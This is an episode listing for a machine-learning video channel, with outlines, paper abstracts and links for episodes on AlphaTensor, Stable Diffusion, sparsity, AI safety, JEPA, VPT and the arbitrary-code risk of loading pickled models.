
Yannic Kilcher Videos (Audio Only)
I make videos about machine learning research papers, programming, and issues of the AI community, and the broader impact of AI in society.
Twitter: https://twitter.com/ykilcher
Discord: https://discord.gg/4H8xxDF
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar (preferred to Patreon): https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Latest episodes

Oct 23, 2022 • 55min
This is a game changer! (AlphaTensor by DeepMind explained)
#alphatensor #deepmind #ai
Matrix multiplication is the most used mathematical operation in all of science and engineering. Speeding this up has massive consequences. Thus, over the years, this operation has become more and more optimized. A fascinating discovery was made when it was shown that one actually needs less than N^3 multiplication operations to multiply to NxN matrices. DeepMind goes a step further and creates AlphaTensor, a Deep Reinforcement Learning algorithm that plays a single-player game, TensorGame, in order to find even more optimized algorithms for matrix multiplication. And it turns out, there exists a plethora of undiscovered matrix multiplication algorithms, which not only will make everything from computers to smart toasters faster, but also bring new insights into fundamental math and complexity theory.
Sponsor: Assembly AI
Link: https://www.assemblyai.com/?utm_source=youtube&utm_medium=social&utm_campaign=yannic_sentiment
OUTLINE:
0:00 - Intro
1:50 - Sponsor: Assembly AI (link in description)
3:25 - What even is Matrix Multiplication?
6:10 - A very astounding fact
8:45 - Trading multiplications for additions
12:35 - Matrix Multiplication as a Tensor
17:30 - Tensor Decompositions
20:30 - A formal way of finding multiplication algorithms
31:00 - How to formulate this as a game?
39:30 - A brief primer on AlphaZero / MCTS
45:40 - The Results
48:15 - Optimizing for different hardware
52:40 - Expanding fundamental math
53:45 - Summary & Final Comments
Paper: https://www.nature.com/articles/s41586-022-05172-4
Title: Discovering faster matrix multiplication algorithms with reinforcement learning
Abstract:
Improving the efficiency of algorithms for fundamental computations can have a widespread impact, as it can affect the overall speed of a large amount of computations. Matrix multiplication is one such primitive task, occurring in many systems—from neural networks to scientific computing routines. The automatic discovery of algorithms using machine learning offers the prospect of reaching beyond human intuition and outperforming the current best human-designed algorithms. However, automating the algorithm discovery procedure is intricate, as the space of possible algorithms is enormous. Here we report a deep reinforcement learning approach based on AlphaZero1 for discovering efficient and provably correct algorithms for the multiplication of arbitrary matrices. Our agent, AlphaTensor, is trained to play a single-player game where the objective is finding tensor decompositions within a finite factor space. AlphaTensor discovered algorithms that outperform the state-of-the-art complexity for many matrix sizes. Particularly relevant is the case of 4 × 4 matrices in a finite field, where AlphaTensor’s algorithm improves on Strassen’s two-level algorithm for the first time, to our knowledge, since its discovery 50 years ago2. We further showcase the flexibility of AlphaTensor through different use-cases: algorithms with state-of-the-art complexity for structured matrix multiplication and improved practical efficiency by optimizing matrix multiplication for runtime on specific hardware. Our results highlight AlphaTensor’s ability to accelerate the process of algorithmic discovery on a range of problems, and to optimize for different criteria.
Authors: Alhussein Fawzi, Matej Balog, Aja Huang, Thomas Hubert, Bernardino Romera-Paredes, Mohammadamin Barekatain, Alexander Novikov, Francisco J. R. Ruiz, Julian Schrittwieser, Grzegorz Swirszcz, David Silver, Demis Hassabis & Pushmeet Kohli

Oct 23, 2022 • 27min
[ML News] Stable Diffusion Takes Over! (Open Source AI Art)
#stablediffusion #aiart #mlnews
Stable Diffusion has been released and is riding a wave of creativity and collaboration. But not everyone is happy about this...
Sponsor: NVIDIA
GPU Raffle: https://ykilcher.com/gtc
OUTLINE:
0:00 - Introduction
0:30 - What is Stable Diffusion?
2:25 - Open-Source Contributions and Creations
7:55 - Textual Inversion
9:30 - OpenAI vs Open AI
14:20 - Journalists be outraged
16:20 - AI Ethics be even more outraged
19:45 - Do we need a new social contract?
21:30 - More applications
22:55 - Helpful Things
23:45 - Sponsor: NVIDIA (& how to enter the GPU raffle)
References: https://early-hair-c20.notion.site/Stable-Diffusion-Takes-Over-Referenes-7a2f45b8f7e04ae0ba19dbfcd2b7f7c0
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Oct 23, 2022 • 50min
How to make your CPU as fast as a GPU - Advances in Sparsity w/ Nir Shavit
#ai #sparsity #gpu
Sparsity is awesome, but only recently has it become possible to properly handle sparse models at good performance. Neural Magic does exactly this, using a plain CPU. No specialized hardware needed, just clever algorithms for pruning and forward-propagation of neural networks. Nir Shavit and I talk about how this is possible, what it means in terms of applications, and why sparsity should play a much larger role in the Deep Learning community.
Sponsor: AssemblyAI
Link: https://www.assemblyai.com/?utm_sourc...
Check out Neural Magic: https://neuralmagic.com/
and DeepSparse: https://github.com/neuralmagic/deepsp...
OUTLINE:
0:00 Introduction
1:08 Sponsor: AssemblyAI
2:50 Start of Interview
4:15 How the NIR company was founded?
5:10 What is Sparsity about?
9:30 Link between the human brain and sparsity
12:10 Where should the extra resource that the human brain doesn't have go?
14:40 Analogy for Sparse Architecture
16:48 Possible future for Sparse Architecture as standard architure for Neural Networks
20:08 Pruning & Sparsification
22:57 What keeps us from building sparse models?
25:34 Why are GPUs so unsuited for sparse models?
28:47 CPU and GPU in connection with memory
30:14 What Neural Magic does?
32:54 How do you deal with overlaps in tensor columns?
33:41 The best type of sparsity to execute tons of CPU
37:24 What kind of architecture would make the best use out of a combined system of CPUs and GPUs?
41:04 Graph Neural Networks in connection to sparsity
43:04 Intrinsic connection between the Sparsification of Neural Networks, Non Layer-Wise Computation, Blockchain Technology, Smart Contracts and Distributed Computing
45:23 Neural Magic's target audience
48:16 Is there a type of model where it works particularly well and the type where it doesn't?
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube:
/ yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannick...
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Sep 15, 2022 • 1h 7min
More Is Different for AI - Scaling Up, Emergence, and Paperclip Maximizers (w/ Jacob Steinhardt)
#ai #interview #research
Jacob Steinhardt believes that future AI systems will be qualitatively different than the ones we know currently. We talk about how emergence happens when scaling up, what implications that has on AI Safety, and why thought experiments like the Paperclip Maximizer might be more useful than most people think.
OUTLINE:
0:00 Introduction
1:10 Start of Interview
2:10 Blog posts series
3:56 More Is Different for AI (Blog Post)
7:40 Do you think this emergence is mainly a property from the interaction of things?
9:17 How does phase transition or scaling-up play into AI and Machine Learning?
12:10 GPT-3 as an example of qualitative difference in scaling up
14:08 GPT-3 as an emergent phenomenon in context learning
15:58 Brief introduction of different viewpoints on the future of AI and its alignment
18:51 How does the phenomenon of emergence play into this game between the Engineering and the Philosophy viewpoint?
22:41 Paperclip Maximizer on AI safety and alignment
31:37 Thought Experiments
37:34 Imitative Deception
39:30 TruthfulQA: Measuring How Models Mimic Human Falsehoods (Paper)
42:24 ML Systems Will Have Weird Failure Models (Blog Post)
51:10 Is there any work to get a system to be deceptive?
54:37 Empirical Findings Generalize Surprisingly Far (Blog Post)
1:00:18 What would you recommend to guarantee better AI alignment or safety?
1:05:13 Remarks
References:
https://bounded-regret.ghost.io/more-is-different-for-ai/
https://docs.google.com/document/d/1FbTuRvC4TFWzGYerTKpBU7FJlyvjeOvVYF2uYNFSlOc/edit#heading=h.n1wk9bxo847o
Links:
TabNine Code Completion (Referral): http://bit.ly/tabnine-yannick
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
BitChute: https://www.bitchute.com/channel/yannic-kilcher
LinkedIn: https://www.linkedin.com/in/ykilcher
BiliBili: https://space.bilibili.com/2017636191
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannickilcher
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Sep 7, 2022 • 20min
The hidden dangers of loading open-source AI models (ARBITRARY CODE EXPLOIT!)
#huggingface #pickle #exploit
Did you know that something as simple as loading a model can execute arbitrary code on your machine?
Try the model: https://huggingface.co/ykilcher/total...
Get the code: https://github.com/yk/patch-torch-save
Sponsor: Weights & Biases
Go here: https://wandb.me/yannic
OUTLINE:
0:00 - Introduction
1:10 - Sponsor: Weights & Biases
3:20 - How Hugging Face models are loaded
5:30 - From PyTorch to pickle
7:10 - Understanding how pickle saves data
13:00 - Executing arbitrary code
15:05 - The final code
17:25 - How can you protect yourself?
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannick...
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Aug 29, 2022 • 1h 2min
The Future of AI is Self-Organizing and Self-Assembling (w/ Prof. Sebastian Risi)
#ai #selforganization #emergence
Read Sebastian's article here: https://sebastianrisi.com/self_assemb...
OUTLINE:
0:00 - Introduction
2:25 - Start of Interview
4:00 - The intelligence of swarms
9:15 - The game of life & neural cellular automata
14:10 - What's missing from neural CAs?
17:20 - How does local computation compare to centralized computation?
25:40 - Applications beyond games and graphics
33:00 - Can we do away with goals?
35:30 - Where do these methods shine?
43:30 - The paradox of scales & brains
49:45 - Connections to graphical systems & GNNs
51:30 - Could this solve ARC?
57:45 - Where can people get started?
References:
https://sebastianrisi.com/
https://modl.ai/
https://sebastianrisi.com/self_assemb...
https://twitter.com/risi1979/status/1...
https://distill.pub/2020/growing-ca/
https://arxiv.org/abs/2201.12360?sour...
https://distill.pub/2020/selforg/mnist/
https://arxiv.org/pdf/2204.11674.pdf
https://github.com/fchollet/ARC
https://github.com/volotat/ARC-Game
http://animalaiolympics.com/AAI/
https://www.deepmind.com/publications...
https://melaniemitchell.me/BooksConte...
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannick...
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Aug 29, 2022 • 26min
The Man behind Stable Diffusion
#stablediffusion #ai #stabilityai
An interview with Emad Mostaque, founder of Stability AI.
OUTLINE:
0:00 - Intro
1:30 - What is Stability AI?
3:45 - Where does the money come from?
5:20 - Is this the CERN of AI?
6:15 - Who gets access to the resources?
8:00 - What is Stable Diffusion?
11:40 - What if your model produces bad outputs?
14:20 - Do you employ people?
16:35 - Can you prevent the corruption of profit?
19:50 - How can people find you?
22:45 - Final thoughts, let's destroy PowerPoint
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannick...
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Aug 3, 2022 • 14min
[ML News] BLOOM: 176B Open-Source | Chinese Brain-Scale Computer | Meta AI: No Language Left Behind
#mlnews #bloom #ai
Today we look at all the recent giant language models in the AI world!
OUTLINE:
0:00 - Intro
0:55 - BLOOM: Open-Source 176B Language Model
5:25 - YALM 100B
5:40 - Chinese Brain-Scale Supercomputer
7:25 - Meta AI Translates over 200 Languages
10:05 - Reproducibility Crisis Workshop
10:55 - AI21 Raises $64M
11:50 - Ian Goodfellow leaves Apple
12:20 - Andrej Karpathy leaves Tesla
12:55 - Wordalle
References:
BLOOM: Open-Source 176B Language Model
https://bigscience.huggingface.co/blo...
https://huggingface.co/spaces/bigscie...
https://huggingface.co/bigscience/blo...
YALM 100B
https://github.com/yandex/YaLM-100B
Chinese Brain-Scale Supercomputer
https://www.scmp.com/news/china/scien...
https://archive.ph/YaoA6#selection-12...
Meta AI Translates over 200 Languages
https://ai.facebook.com/research/no-l...
Reproducibility Crisis Workshop
https://reproducible.cs.princeton.edu/
AI21 Raises $64M
https://techcrunch.com/2022/07/12/ope...
Ian Goodfellow leaves Apple
https://twitter.com/goodfellow_ian/st...
Andrey Karpathy leaves Tesla
https://mobile.twitter.com/karpathy/s...
https://www.businessinsider.com/repor...
Wordalle
https://huggingface.co/spaces/hugging...
Links:
Homepage: https://ykilcher.com
Merch: ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannick...
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Jul 10, 2022 • 60min
JEPA - A Path Towards Autonomous Machine Intelligence (Paper Explained)
Yann LeCun's position paper on a path towards machine intelligence combines Self-Supervised Learning, Energy-Based Models, and hierarchical predictive embedding models to arrive at a system that can teach itself to learn useful abstractions at multiple levels and use that as a world model to plan ahead in time.
OUTLINE:
0:00 - Introduction
2:00 - Main Contributions
5:45 - Mode 1 and Mode 2 actors
15:40 - Self-Supervised Learning and Energy-Based Models
20:15 - Introducing latent variables
25:00 - The problem of collapse
29:50 - Contrastive vs regularized methods
36:00 - The JEPA architecture
47:00 - Hierarchical JEPA (H-JEPA)
53:00 - Broader relevance
56:00 - Summary & Comments
Paper: https://openreview.net/forum?id=BZ5a1...
Abstract: How could machines learn as efficiently as humans and animals? How could machines learn to reason and plan? How could machines learn representations of percepts and action plans at multiple levels of abstraction, enabling them to reason, predict, and plan at multiple time horizons? This position paper proposes an architecture and training paradigms with which to construct autonomous intelligent agents. It combines concepts such as configurable predictive world model, behavior driven through intrinsic motivation, and hierarchical joint embedding architectures trained with self-supervised learning.
Author: Yann LeCun
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannick...
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n

Jun 28, 2022 • 33min
Video PreTraining (VPT): Learning to Act by Watching Unlabeled Online Videos (Paper Explained)
#openai #vpt #minecraft
Minecraft is one of the harder challenges any RL agent could face. Episodes are long, and the world is procedurally generated, complex, and huge. Further, the action space is a keyboard and a mouse, which has to be operated only given the game's video input. OpenAI tackles this challenge using Video PreTraining, leveraging a small set of contractor data in order to pseudo-label a giant corpus of scraped footage of gameplay. The pre-trained model is highly capable in basic game mechanics and can be fine-tuned much better than a blank slate model. This is the first Minecraft agent that achieves the elusive goal of crafting a diamond pickaxe all by itself.
OUTLINE:
0:00 - Intro
3:50 - How to spend money most effectively?
8:20 - Getting a large dataset with labels
14:40 - Model architecture
19:20 - Experimental results and fine-tuning
25:40 - Reinforcement Learning to the Diamond Pickaxe
30:00 - Final comments and hardware
Blog: https://openai.com/blog/vpt/
Paper: https://arxiv.org/abs/2206.11795
Code & Model weights: https://github.com/openai/Video-Pre-T...
Abstract:
Pretraining on noisy, internet-scale datasets has been heavily studied as a technique for training models with broad, general capabilities for text, images, and other modalities. However, for many sequential decision domains such as robotics, video games, and computer use, publicly available data does not contain the labels required to train behavioral priors in the same way. We extend the internet-scale pretraining paradigm to sequential decision domains through semi-supervised imitation learning wherein agents learn to act by watching online unlabeled videos. Specifically, we show that with a small amount of labeled data we can train an inverse dynamics model accurate enough to label a huge unlabeled source of online data -- here, online videos of people playing Minecraft -- from which we can then train a general behavioral prior. Despite using the native human interface (mouse and keyboard at 20Hz), we show that this behavioral prior has nontrivial zero-shot capabilities and that it can be fine-tuned, with both imitation learning and reinforcement learning, to hard-exploration tasks that are impossible to learn from scratch via reinforcement learning. For many tasks our models exhibit human-level performance, and we are the first to report computer agents that can craft diamond tools, which can take proficient humans upwards of 20 minutes (24,000 environment actions) of gameplay to accomplish.
Authors: Bowen Baker, Ilge Akkaya, Peter Zhokhov, Joost Huizinga, Jie Tang, Adrien Ecoffet, Brandon Houghton, Raul Sampedro, Jeff Clune
Links:
Homepage: https://ykilcher.com
Merch: https://ykilcher.com/merch
YouTube: https://www.youtube.com/c/yannickilcher
Twitter: https://twitter.com/ykilcher
Discord: https://ykilcher.com/discord
LinkedIn: https://www.linkedin.com/in/ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: https://www.subscribestar.com/yannick...
Patreon: https://www.patreon.com/yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n